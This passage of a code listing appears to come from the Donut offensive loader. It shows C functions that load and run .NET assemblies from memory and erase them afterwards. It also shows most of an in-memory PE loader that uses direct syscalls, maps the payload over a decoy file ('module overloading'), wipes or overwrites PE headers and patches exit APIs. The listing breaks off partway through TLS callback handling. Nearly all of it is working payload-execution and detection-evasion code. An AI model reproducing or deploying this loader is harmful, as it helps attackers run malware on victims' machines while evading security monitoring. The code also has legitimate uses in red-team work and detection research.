28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 BOOL LoadAssembly(PDONUT_INSTANCE inst, PDONUT_MODULE mod, PDONUT_ASSEMBLY pa) {
32 HRESULT hr = S_OK;
33 BSTR domain;
34 SAFEARRAYBOUND sab;
35 SAFEARRAY *sa;
36 DWORD i;
37 BOOL loaded=FALSE, loadable;
38 PBYTE p;
39 WCHAR buf[DONUT_MAX_NAME];
40
41 if(inst->api.CLRCreateInstance != NULL) {
42 DPRINT("CLRCreateInstance");
43
44 hr = inst->api.CLRCreateInstance(
45 (REFCLSID)&inst->xCLSID_CLRMetaHost,
46 (REFIID)&inst->xIID_ICLRMetaHost,
47 (LPVOID*)&pa->icmh);
48
49 if(SUCCEEDED(hr)) {
50 DPRINT("ICLRMetaHost::GetRuntime(\"%s\")", mod->runtime);
51 ansi2unicode(inst, mod->runtime, buf);
52
53 hr = pa->icmh->lpVtbl->GetRuntime(
54 pa->icmh, buf,
55 (REFIID)&inst->xIID_ICLRRuntimeInfo, (LPVOID)&pa->icri);
56
57 if(SUCCEEDED(hr)) {
58 DPRINT("ICLRRuntimeInfo::IsLoadable");
59 hr = pa->icri->lpVtbl->IsLoadable(pa->icri, &loadable);
60
61 if(SUCCEEDED(hr) && loadable) {
62 DPRINT("ICLRRuntimeInfo::GetInterface");
63
64 hr = pa->icri->lpVtbl->GetInterface(
65 pa->icri,
66 (REFCLSID)&inst->xCLSID_CorRuntimeHost,
67 (REFIID)&inst->xIID_ICorRuntimeHost,
68 (LPVOID)&pa->icrh);
69
70 DPRINT("HRESULT: %08lx", hr);
71 }
72 } else pa->icri = NULL;
73 } else pa->icmh = NULL;
74 }
75 // fall back on CorBindToRuntime when CLRCreateInstance isn't available
76 // or for example when the above code failed.
77 if(FAILED(hr) || inst->api.CLRCreateInstance == NULL) {
78 DPRINT("Trying CorBindToRuntime");
79
80 hr = inst->api.CorBindToRuntime(
81 NULL, // load whatever's available
82 NULL, // load workstation build
83 &inst->xCLSID_CorRuntimeHost,
84 &inst->xIID_ICorRuntimeHost,
85 (LPVOID*)&pa->icrh);
86
87 DPRINT("HRESULT: %08lx", hr);
88 }
89
90 if(FAILED(hr)) {
91 pa->icrh = NULL;
92 return FALSE;
93 }
94 DPRINT("ICorRuntimeHost::Start");
95
96 hr = pa->icrh->lpVtbl->Start(pa->icrh);
97
98 if(SUCCEEDED(hr)) {
99 // if no domain name specified
100 if(mod->domain[0] == 0) {
101 DPRINT("ICorRuntimeHost::GetDefaultDomain()");
102 // use the default
103 hr = pa->icrh->lpVtbl->GetDefaultDomain(pa->icrh, &pa->iu);
104 } else {
105 // else create a new domain using the name
106 DPRINT("Domain is %s", mod->domain);
107 ansi2unicode(inst, mod->domain, buf);
108 domain = inst->api.SysAllocString(buf);
109
110 DPRINT("ICorRuntimeHost::CreateDomain(\"%ws\")", buf);
111
112 hr = pa->icrh->lpVtbl->CreateDomain(
113 pa->icrh, domain, NULL, &pa->iu);
114
115 inst->api.SysFreeString(domain);
116 }
117
118 if(SUCCEEDED(hr)) {
119 DPRINT("IUnknown::QueryInterface");
120
121 hr = pa->iu->lpVtbl->QueryInterface(
122 pa->iu, (REFIID)&inst->xIID_AppDomain, (LPVOID)&pa->ad);
123
124 if(SUCCEEDED(hr)) {
125 sab.lLbound = 0;
126 sab.cElements = mod->len;
127 sa = inst->api.SafeArrayCreate(VT_UI1, 1, &sab);
128
129 if(sa != NULL) {
130 DPRINT("Copying %" PRIi32 " bytes of assembly to safe array", mod->len);
131
132 for(i=0, p=sa->pvData; i<mod->len; i++) {
133 p[i] = mod->data[i];
134 }
135
136 DPRINT("AppDomain::Load_3");
137
138 hr = pa->ad->lpVtbl->Load_3(
139 pa->ad, sa, &pa->as);
140
141 loaded = hr == S_OK;
142
143 DPRINT("HRESULT : %08lx", hr);
144
145 DPRINT("Erasing assembly from memory");
146
147 for(i=0, p=sa->pvData; i<mod->len; i++) {
148 p[i] = mod->data[i] = 0;
149 }
150
151 DPRINT("SafeArrayDestroy");
152 inst->api.SafeArrayDestroy(sa);
153 }
154 }
155 }
156 }
157 return loaded;
158 }
159
160 BOOL RunAssembly(PDONUT_INSTANCE inst, PDONUT_MODULE mod, PDONUT_ASSEMBLY pa) {
161 SAFEARRAY *sav=NULL, *args=NULL;
162 VARIANT arg, ret, vtPsa, v1={0}, v2;
163 DWORD i;
164 HRESULT hr;
165 BSTR cls, method;
166 ULONG cnt;
167 OLECHAR str[1]={0};
168 LONG ucnt, lcnt;
169 WCHAR **argv, buf[DONUT_MAX_NAME+1];
170 int argc;
171
172 DPRINT("Type is %s",
173 mod->type == DONUT_MODULE_NET_DLL ? "DLL" : "EXE");
174
175 // if this is a program
176 if(mod->type == DONUT_MODULE_NET_EXE) {
177 // get the entrypoint
178 DPRINT("MethodInfo::EntryPoint");
179 hr = pa->as->lpVtbl->EntryPoint(pa->as, &pa->mi);
180
181 if(SUCCEEDED(hr)) {
182 // get the parameters for entrypoint
183 DPRINT("MethodInfo::GetParameters");
184 hr = pa->mi->lpVtbl->GetParameters(pa->mi, &args);
185
186 if(SUCCEEDED(hr)) {
187 DPRINT("SafeArrayGetLBound");
188 hr = inst->api.SafeArrayGetLBound(args, 1, &lcnt);
189
190 DPRINT("SafeArrayGetUBound");
191 hr = inst->api.SafeArrayGetUBound(args, 1, &ucnt);
192 cnt = ucnt - lcnt + 1;
193 DPRINT("Number of parameters for entrypoint : %i", cnt);
194
195 // does Main require string[] args?
196 if(cnt != 0) {
197 // create a 1 dimensional array for Main parameters
198 sav = inst->api.SafeArrayCreateVector(VT_VARIANT, 0, 1);
199 // if user specified their own parameters, add to string array
200 if(mod->args[0] != 0) {
201 ansi2unicode(inst, mod->args, buf);
202 argv = inst->api.CommandLineToArgvW(buf, &argc);
203 // create 1 dimensional array for strings[] args
204 vtPsa.vt = (VT_ARRAY | VT_BSTR);
205 vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, argc);
206
207 // add each string parameter
208 for(i=0; i<argc; i++) {
209 DPRINT("Adding \"%ws\" as parameter %i", argv[i], (i + 1));
210 inst->api.SafeArrayPutElement(vtPsa.parray,
211 &i, inst->api.SysAllocString(argv[i]));
212 }
213 } else {
214 DPRINT("Adding empty string for invoke_3");
215 // add empty string to make it work
216 // create 1 dimensional array for strings[] args
217 vtPsa.vt = (VT_ARRAY | VT_BSTR);
218 vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, 1);
219
220 i=0;
221 inst->api.SafeArrayPutElement(vtPsa.parray,
222 &i, inst->api.SysAllocString(str));
223 }
224 // add string array to list of parameters
225 i=0;
226 inst->api.SafeArrayPutElement(sav, &i, &vtPsa);
227 }
228 v1.vt = VT_NULL;
229 v1.plVal = NULL;
230
231 DPRINT("MethodInfo::Invoke_3()\n");
232
233 hr = pa->mi->lpVtbl->Invoke_3(pa->mi, v1, sav, &v2);
234
235 DPRINT("MethodInfo::Invoke_3 : %08lx : %s",
236 hr, SUCCEEDED(hr) ? "Success" : "Failed");
237
238 if(sav != NULL) {
239 inst->api.SafeArrayDestroy(vtPsa.parray);
240 inst->api.SafeArrayDestroy(sav);
241 }
242 }
243 } else pa->mi = NULL;
244 } else {
245 ansi2unicode(inst, mod->cls, buf);
246 cls = inst->api.SysAllocString(buf);
247 if(cls == NULL) return FALSE;
248 DPRINT("Class: SysAllocString(\"%ws\")", buf);
249
250 ansi2unicode(inst, mod->method, buf);
251 method = inst->api.SysAllocString(buf);
252 DPRINT("Method: SysAllocString(\"%ws\")", buf);
253
254 if(method != NULL) {
255 DPRINT("Assembly::GetType_2");
256 hr = pa->as->lpVtbl->GetType_2(pa->as, cls, &pa->type);
257
258 if(SUCCEEDED(hr)) {
259 sav = NULL;
260 DPRINT("Parameters: %s", mod->args);
261
262 if(mod->args[0] != 0) {
263 ansi2unicode(inst, mod->args, buf);
264 argv = inst->api.CommandLineToArgvW(buf, &argc);
265 DPRINT("SafeArrayCreateVector(%li argument(s))", argc);
266
267 sav = inst->api.SafeArrayCreateVector(VT_VARIANT, 0, argc);
268
269 if(sav != NULL) {
270 for(i=0; i<argc; i++) {
271 DPRINT("Adding \"%ws\" as argument %i", argv[i], (i+1));
272
273 V_BSTR(&arg) = inst->api.SysAllocString(argv[i]);
274 V_VT(&arg) = VT_BSTR;
275
276 hr = inst->api.SafeArrayPutElement(sav, &i, &arg);
277
278 if(FAILED(hr)) {
279 DPRINT("SafeArrayPutElement failed.");
280 inst->api.SafeArrayDestroy(sav);
281 sav = NULL;
282 }
283 }
284 }
285 }
286 if(SUCCEEDED(hr)) {
287 DPRINT("Calling Type::InvokeMember_3");
288
289 hr = pa->type->lpVtbl->InvokeMember_3(
290 pa->type,
291 method, // name of method
292 BindingFlags_InvokeMethod |
293 BindingFlags_Static |
294 BindingFlags_Public,
295 NULL,
296 v1, // empty VARIANT
297 sav, // arguments to method
298 &ret); // return code from method
299
300 DPRINT("Type::InvokeMember_3 : %08lx : %s",
301 hr, SUCCEEDED(hr) ? "Success" : "Failed");
302
303 if(sav != NULL) {
304 inst->api.SafeArrayDestroy(sav);
305 }
306 }
307 }
308 inst->api.SysFreeString(method);
309 }
310 inst->api.SysFreeString(cls);
311 }
312 return TRUE;
313 }
314
315 VOID FreeAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
316 HRESULT hr;
317
318 if(pa->type != NULL) {
319 DPRINT("Type::Release");
320 hr = pa->type->lpVtbl->Release(pa->type);
321 pa->type = NULL;
322 DPRINT("HRESULT : %08lX", hr);
323 }
324
325 if(pa->mi != NULL) {
326 DPRINT("MethodInfo::Release");
327 hr = pa->mi->lpVtbl->Release(pa->mi);
328 pa->mi = NULL;
329 DPRINT("HRESULT : %08lX", hr);
330 }
331
332 if(pa->as != NULL) {
333 DPRINT("Assembly::Release");
334 hr = pa->as->lpVtbl->Release(pa->as);
335 pa->as = NULL;
336 DPRINT("HRESULT : %08lX", hr);
337 }
338
339 if(pa->icrh != NULL) {
340 DPRINT("ICorRuntimeHost::UnloadDomain");
341 hr = pa->icrh->lpVtbl->UnloadDomain(pa->icrh, (IUnknown*)pa->ad);
342 DPRINT("HRESULT : %08lX", hr);
343
344 DPRINT("ICorRuntimeHost::Stop");
345 hr = pa->icrh->lpVtbl->Stop(pa->icrh);
346 DPRINT("HRESULT : %08lX", hr);
347
348 DPRINT("ICorRuntimeHost::Release");
349 hr = pa->icrh->lpVtbl->Release(pa->icrh);
350 pa->icrh = NULL;
351 DPRINT("HRESULT : %08lX", hr);
352 }
353
354 if(pa->ad != NULL) {
355 DPRINT("AppDomain::Release");
356 hr = pa->ad->lpVtbl->Release(pa->ad);
357 pa->ad = NULL;
358 DPRINT("HRESULT : %08lX", hr);
359 }
360
361 if(pa->iu != NULL) {
362 DPRINT("IUnknown::Release");
363 hr = pa->iu->lpVtbl->Release(pa->iu);
364 pa->iu = NULL;
365 DPRINT("HRESULT : %08lX", hr);
366 }
367
368 if(pa->icri != NULL) {
369 DPRINT("ICLRRuntimeInfo::Release");
370 hr = pa->icri->lpVtbl->Release(pa->icri);
371 pa->icri = NULL;
372 DPRINT("HRESULT : %08lX", hr);
373 }
374
375 if(pa->icmh != NULL) {
376 DPRINT("ICLRMetaHost::Release");
377 hr = pa->icmh->lpVtbl->Release(pa->icmh);
378 pa->icmh = NULL;
379 DPRINT("HRESULT : %08lX", hr);
380 }
381 }
+747
-0
loader/inmem_pe.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifdef _WIN64
32 #define IMAGE_REL_TYPE IMAGE_REL_BASED_DIR64
33 #else
34 #define IMAGE_REL_TYPE IMAGE_REL_BASED_HIGHLOW
35 #endif
36
37 typedef struct _IMAGE_RELOC {
38 WORD offset :12;
39 WORD type :4;
40 } IMAGE_RELOC, *PIMAGE_RELOC;
41
42 typedef BOOL (WINAPI *DllMain_t)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
43 typedef VOID (WINAPI *Start_t)(PPEB);
44 typedef VOID (WINAPI *DllParam_t)(PVOID);
45 typedef VOID (WINAPI *DllVoid_t)(VOID);
46
47 // for setting the command line...
48 typedef CHAR** (WINAPI *p_acmdln_t)(VOID);
49 typedef WCHAR** (WINAPI *p_wcmdln_t)(VOID);
50
51 BOOL SetCommandLineW(PDONUT_INSTANCE inst, PCWSTR NewCommandLine);
52 BOOL IsExitAPI(PDONUT_INSTANCE inst, PCHAR name);
53
54 // In-Memory execution of unmanaged DLL file. YMMV with EXE files requiring subsystem..
55 VOID RunPE(PDONUT_INSTANCE inst, PDONUT_MODULE mod) {
56 PIMAGE_DOS_HEADER dos, doshost;
57 PIMAGE_NT_HEADERS nt, nthost;
58 PIMAGE_SECTION_HEADER sh;
59 PIMAGE_SECTION_HEADER shcp = NULL;
60 PIMAGE_THUNK_DATA oft, ft;
61 PIMAGE_IMPORT_BY_NAME ibn;
62 PIMAGE_IMPORT_DESCRIPTOR imp;
63 PIMAGE_DELAYLOAD_DESCRIPTOR del;
64 PIMAGE_EXPORT_DIRECTORY exp;
65 PIMAGE_TLS_DIRECTORY tls;
66 PIMAGE_TLS_CALLBACK *callbacks;
67 PIMAGE_RELOC list;
68 PIMAGE_BASE_RELOCATION ibr;
69 IMAGE_NT_HEADERS ntc;
70 DWORD rva, size;
71 PDWORD adr;
72 PDWORD sym;
73 PWORD ord;
74 PBYTE ofs;
75 PCHAR str, name;
76 HMODULE dll;
77 ULONG_PTR ptr;
78 DllMain_t DllMain; // DLL
79 Start_t Start; // EXE
80 DllParam_t DllParam = NULL; // DLL function accepting one string parameter
81 DllVoid_t DllVoid = NULL; // DLL function that accepts no parametersd
82 LPVOID base, host;
83 DWORD i, cnt;
84 HANDLE hThread;
85 WCHAR buf[DONUT_MAX_NAME+1];
86 PVOID baseAddress;
87 SIZE_T numBytes;
88 DWORD newprot, oldprot;
89 NTSTATUS status;
90 HANDLE hSection;
91 LARGE_INTEGER liSectionSize;
92 PVOID cs = NULL;
93 SIZE_T viewSize = 0;
94 PVOID ba;
95 SIZE_T rs;
96 CLIENT_ID cid;
97 BOOL has_reloc;
98 PSYSCALL_LIST syscall_list;
99
100 syscall_list = (PSYSCALL_LIST)(ULONG_PTR)inst->syscall_list;
101
102 base = mod->data;
103 dos = (PIMAGE_DOS_HEADER)base;
104 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
105
106 // before doing anything. check compatibility between exe/dll and host process.
107 host = inst->api.GetModuleHandle(NULL);
108 doshost = (PIMAGE_DOS_HEADER)host;
109 nthost = RVA2VA(PIMAGE_NT_HEADERS, host, doshost->e_lfanew);
110
111 if(nt->FileHeader.Machine != nthost->FileHeader.Machine) {
112 DPRINT("Host process %08lx and file %08lx are not compatible...cannot load.",
113 nthost->FileHeader.Machine, nt->FileHeader.Machine);
114 return;
115 }
116
117 DPRINT("Allocating %" PRIi32 " (0x%" PRIx32 ") bytes of RWX memory for file",
118 nt->OptionalHeader.SizeOfImage, nt->OptionalHeader.SizeOfImage);
119
120 liSectionSize.QuadPart = nt->OptionalHeader.SizeOfImage;
121
122 // check if the binary has relocation information
123 size = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
124 has_reloc = size == 0? FALSE : TRUE;
125 if (!has_reloc)
126 {
127 DPRINT("No relocation information present, setting the base to: 0x%p", (PVOID)nt->OptionalHeader.ImageBase);
128 cs = (PVOID)nt->OptionalHeader.ImageBase;
129 }
130
131 DPRINT("Creating section to store PE.");
132 if (inst->decoy[0] == 0) {
133 status = NtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, &liSectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL, syscall_list);
134 DPRINT("NTSTATUS: 0x%lx", status);
135 if(!NT_SUCCESS(status)) return;
136 }
137 else {
138 DPRINT("Decoy file path: %ls", inst->decoy);
139 // implement module overloading by creating a MEM_IMAGE section backed by the decoy file
140 HANDLE hDecoy;
141 OBJECT_ATTRIBUTES obj_attr;
142 IO_STATUS_BLOCK status_block;
143 UNICODE_STRING path;
144 inst->api.RtlInitUnicodeString(&path, (wchar_t*)inst->decoy);
145 // init the object attributes
146 InitializeObjectAttributes(
147 &obj_attr,
148 &path,
149 OBJ_CASE_INSENSITIVE,
150 NULL,
151 NULL
152 );
153 status = NtCreateFile(&hDecoy, GENERIC_READ, &obj_attr, &status_block, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OPEN, FILE_NON_DIRECTORY_FILE, NULL, 0, syscall_list);
154
155 if (!NT_SUCCESS(status) || hDecoy == INVALID_HANDLE_VALUE || hDecoy == 0) {
156 DPRINT("Error opening decoy file: %d", inst->api.GetLastError());
157 return;
158 }
159 DPRINT("File handle: %p", hDecoy);
160
161 status = NtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, NULL, PAGE_READONLY, SEC_IMAGE, hDecoy, syscall_list);
162
163 NtClose(hDecoy, syscall_list);
164
165 DPRINT("NTSTATUS: 0x%lx", status);
166 if(!NT_SUCCESS(status)) return;
167 }
168
169 DPRINT("Mapping local view of section to store PE.");
170 status = NtMapViewOfSection(hSection, NtCurrentProcess(), &cs, 0, 0, NULL, &viewSize, ViewUnmap, 0, PAGE_READWRITE, syscall_list);
171 DPRINT("NTSTATUS: 0x%lx", status);
172 if(!NT_SUCCESS(status)) return;
173
174 if(cs == NULL) return;
175
176 //system("pause");
177
178 // if module overloading, set everything to RW because they will start out otherwise
179 if (inst->decoy[0] != 0) {
180 ba = cs;
181 rs = viewSize;
182 status = NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, PAGE_READWRITE, &oldprot, syscall_list);
183 DPRINT("NTSTATUS: 0x%lx", status);
184 if(!NT_SUCCESS(status)) return;
185 }
186
187 DPRINT("Copying Headers");
188 Memcpy(cs, base, nt->OptionalHeader.SizeOfHeaders);
189
190 DPRINT("Copying each section to memory %p", cs);
191 sh = IMAGE_FIRST_SECTION(nt);
192
193 for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
194 Memcpy((PBYTE)cs + sh[i].VirtualAddress,
195 (PBYTE)base + sh[i].PointerToRawData,
196 sh[i].SizeOfRawData);
197 }
198
199 ofs = (PBYTE)cs - nt->OptionalHeader.ImageBase;
200
201 if (has_reloc && ofs != 0) {
202 DPRINT("Applying Relocations");
203
204 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
205 ibr = RVA2VA(PIMAGE_BASE_RELOCATION, cs, rva);
206
207 while ((PBYTE)ibr < ((PBYTE)cs + rva + size) && ibr->SizeOfBlock != 0) {
208 list = (PIMAGE_RELOC)(ibr + 1);
209
210 while ((PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock) {
211 // check that the RVA is within the boundaries of the PE
212 if (ibr->VirtualAddress + list->offset < nt->OptionalHeader.SizeOfImage) {
213 PULONG_PTR address = (PULONG_PTR)((PBYTE)cs + ibr->VirtualAddress + list->offset);
214 if (list->type == IMAGE_REL_BASED_DIR64) {
215 *address += (ULONG_PTR)ofs;
216 } else if (list->type == IMAGE_REL_BASED_HIGHLOW) {
217 *address += (DWORD)(ULONG_PTR)ofs;
218 } else if (list->type == IMAGE_REL_BASED_HIGH) {
219 *address += HIWORD(ofs);
220 } else if (list->type == IMAGE_REL_BASED_LOW) {
221 *address += LOWORD(ofs);
222 } else if (list->type != IMAGE_REL_BASED_ABSOLUTE) {
223 DPRINT("ERROR: Unrecognized Relocation type %08lx.", list->type);
224 goto pe_cleanup;
225 }
226 }
227 list++;
228 }
229 ibr = (PIMAGE_BASE_RELOCATION)list;
230 }
231 }
232
233 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
234
235 if(rva != 0) {
236 DPRINT("Processing the Import Table");
237
238 imp = RVA2VA(PIMAGE_IMPORT_DESCRIPTOR, cs, rva);
239
240 // For each DLL
241 for (;imp->Name!=0; imp++) {
242 name = RVA2VA(PCHAR, cs, imp->Name);
243
244 dll = xGetLibAddress(inst, name);
245
246 // Resolve the API for this library
247 oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
248 ft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);
249
250 // For each API
251 for (;; oft++, ft++) {
252 // No API left?
253 if (oft->u1.AddressOfData == 0) break;
254
255 // Resolve by ordinal?
256 if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
257 ft->u1.Function = (ULONG_PTR)xGetProcAddress(inst, dll, NULL, oft->u1.Ordinal);
258 } else {
259 // Resolve by name
260 ibn = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
261
262 // run entrypoint as thread?
263 if(mod->thread != 0) {
264 // if this is an exit-related API, replace it with RtlExitUserThread
265 if(IsExitAPI(inst, ibn->Name)) {
266 DPRINT("Replacing %s!%s with ntdll!RtlExitUserThread", name, ibn->Name);
267 ft->u1.Function = (ULONG_PTR)inst->api.RtlExitUserThread;
268 continue;
269 }
270 }
271 ft->u1.Function = (ULONG_PTR)xGetProcAddress(inst, dll, ibn->Name, 0);
272 }
273 }
274 }
275 }
276
277 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].VirtualAddress;
278
279 if(rva != 0) {
280 DPRINT("Processing Delayed Import Table");
281
282 del = RVA2VA(PIMAGE_DELAYLOAD_DESCRIPTOR, cs, rva);
283
284 // For each DLL
285 for (;del->DllNameRVA != 0; del++) {
286 name = RVA2VA(PCHAR, cs, del->DllNameRVA);
287
288 dll = xGetLibAddress(inst, name);
289
290 if(dll == NULL) continue;
291
292 // Resolve the API for this library
293 oft = RVA2VA(PIMAGE_THUNK_DATA, cs, del->ImportNameTableRVA);
294 ft = RVA2VA(PIMAGE_THUNK_DATA, cs, del->ImportAddressTableRVA);
295
296 // For each API
297 for (;; oft++, ft++) {
298 // No API left?
299 if (oft->u1.AddressOfData == 0) break;
300
301 // Resolve by ordinal?
302 if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
303 ft->u1.Function = (ULONG_PTR)xGetProcAddress(inst, dll, NULL, oft->u1.Ordinal);
304 } else {
305 // Resolve by name
306 ibn = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
307 ft->u1.Function = (ULONG_PTR)xGetProcAddress(inst, dll, ibn->Name, 0);
308 }
309 }
310 }
311 }
312
313 Start = RVA2VA(Start_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
314
315 // copy relevant headers before they are wiped
316 ntc = *nt;
317
318 shcp = NULL;
319 rs = ntc.FileHeader.NumberOfSections * sizeof(IMAGE_SECTION_HEADER);
320 status = NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&shcp, 0, &rs, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE, syscall_list);
321 DPRINT("NTSTATUS: 0x%lx", status);
322 if (!NT_SUCCESS(status)) return;
323
324 Memcpy(shcp, sh, ntc.FileHeader.NumberOfSections * sizeof(IMAGE_SECTION_HEADER));
325
326 if(inst->headers == 1)
327 {
328 // if no decoy is specified, just wipe the headers
329 if (inst->decoy[0] == 0)
330 {
331 DPRINT("Wiping Headers from memory");
332 Memset(cs, 0, nt->OptionalHeader.SizeOfHeaders);
333 Memset(base, 0, nt->OptionalHeader.SizeOfHeaders);
334 }
335 else {
336 DPRINT("Overwriting PE headers with the decoy module's.");
337 Memcpy(base, cs, nt->OptionalHeader.SizeOfHeaders);
338 }
339 }
340
341 if (inst->decoy[0] == 0) {
342 DPRINT("Ummapping temporary local view of section to persist changes.");
343 status = NtUnmapViewOfSection(NtCurrentProcess(), cs, syscall_list);
344 DPRINT("NTSTATUS: 0x%lx", status);
345 if(!NT_SUCCESS(status)) return;
346
347 // if no reloc information is present, make sure we use the preferred address
348 if (has_reloc)
349 cs = NULL;
350 viewSize = 0;
351
352 DPRINT("Mapping writecopy local view of section to execute PE.");
353 status = NtMapViewOfSection(hSection, NtCurrentProcess(), &cs, 0, 0, NULL, &viewSize, ViewUnmap, 0, PAGE_EXECUTE_WRITECOPY, syscall_list);
354 DPRINT("NTSTATUS: 0x%lx", status);
355 if(!NT_SUCCESS(status)) return;
356 }
357
358 // start everything out as WC
359 // this is because some sections are padded and you can end up with extra RWX memory if you don't pre-mark the padding as WC
360 DPRINT("Pre-marking module as WC to avoid padding between PE sections staying RWX.")
361 status = NtProtectVirtualMemory(NtCurrentProcess(), &cs, &viewSize, PAGE_WRITECOPY, &oldprot, syscall_list);
362 DPRINT("NTSTATUS: 0x%lx", status);
363 if(!NT_SUCCESS(status)) return;
364
365 DPRINT("Setting permissions for each PE section");
366 // done with binary manipulation, mark section permissions appropriately
367 for (i = 0; i < ntc.FileHeader.NumberOfSections; i++)
368 {
369 BOOL isRead = (shcp[i].Characteristics & IMAGE_SCN_MEM_READ) ? TRUE : FALSE;
370 BOOL isWrite = (shcp[i].Characteristics & IMAGE_SCN_MEM_WRITE) ? TRUE : FALSE;
371 BOOL isExecute = (shcp[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) ? TRUE : FALSE;
372
373 if (isWrite && isExecute)
374 newprot = PAGE_EXECUTE_WRITECOPY;
375 else if (isRead && isExecute)
376 newprot = PAGE_EXECUTE_READ;
377 else if (isRead && isWrite && !isExecute)
378 {
379 if (inst->decoy[0] == 0)
380 newprot = PAGE_WRITECOPY; // must use WC because RW is incompatible with permissions of initial view (WCX)
381 else
382 newprot = PAGE_READWRITE;
383 }
384 else if (!isRead && !isWrite && isExecute)
385 newprot = PAGE_EXECUTE;
386 else if (isRead && !isWrite && !isExecute)
387 newprot = PAGE_READONLY;
388 else if (!isRead && !isWrite && !isExecute)
389 newprot = PAGE_NOACCESS;
390 else if (!isRead && isWrite && !isExecute)
391 newprot = PAGE_WRITECOPY;
392
393 if (shcp[i].Characteristics & IMAGE_SCN_MEM_NOT_CACHED) {
394 newprot |= PAGE_NOCACHE;
395 }
396
397 baseAddress = (PBYTE)cs + shcp[i].VirtualAddress;
398 if (i < (ntc.FileHeader.NumberOfSections - 1))
399 numBytes = ((PBYTE)cs + shcp[i+1].VirtualAddress) - ((PBYTE)cs + shcp[i].VirtualAddress);
400 else
401 numBytes = shcp[i].SizeOfRawData;
402
403 oldprot = 0;
404
405 DPRINT("Section offset: 0x%X", shcp[i].VirtualAddress);
406 DPRINT("Section absolute address: 0x%p", baseAddress);
407 DPRINT("Section size: 0x%lX", numBytes);
408 DPRINT("Section protections: 0x%X", newprot);
409
410 status = NtProtectVirtualMemory(NtCurrentProcess(), &baseAddress, &numBytes, newprot, &oldprot, syscall_list);
411 DPRINT("NTSTATUS: 0x%lx", status);
412 if (!NT_SUCCESS(status)) return;
413 }
414
415 // declare variables and set permissions of module header
416 DPRINT("Setting permissions of module headers to READONLY (%d bytes)", ntc.OptionalHeader.BaseOfCode);
417 oldprot = 0;
418 numBytes = ntc.OptionalHeader.BaseOfCode;
419 status = NtProtectVirtualMemory(NtCurrentProcess(), &cs, &numBytes, PAGE_READONLY, &oldprot, syscall_list);
420 DPRINT("NTSTATUS: 0x%lx", status);
421 if (!NT_SUCCESS(status)) return;
422
423 DPRINT("Flushing instructionCache");
424 status = NtFlushInstructionCache(NtCurrentProcess(), NULL, 0, syscall_list);
425 DPRINT("NTSTATUS: 0x%lx", status);
426 if (!NT_SUCCESS(status)) return;
427
428 /**
429 Execute TLS callbacks. These are only called when the process starts, not when a thread begins, ends
430 or when the process ends. TLS is not fully supported.
431 */
432 rva = ntc.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].VirtualAddress;
433
434 if(rva != 0) {
435 DPRINT("Processing TLS directory");
436
437 tls = RVA2VA(PIMAGE_TLS_DIRECTORY, cs, rva);
438
439 // address of callbacks is absolute. requires relocation information
440 callbacks = (PIMAGE_TLS_CALLBACK*)tls->AddressOfCallBacks;
441 DPRINT("AddressOfCallBacks : %p", callbacks);
442
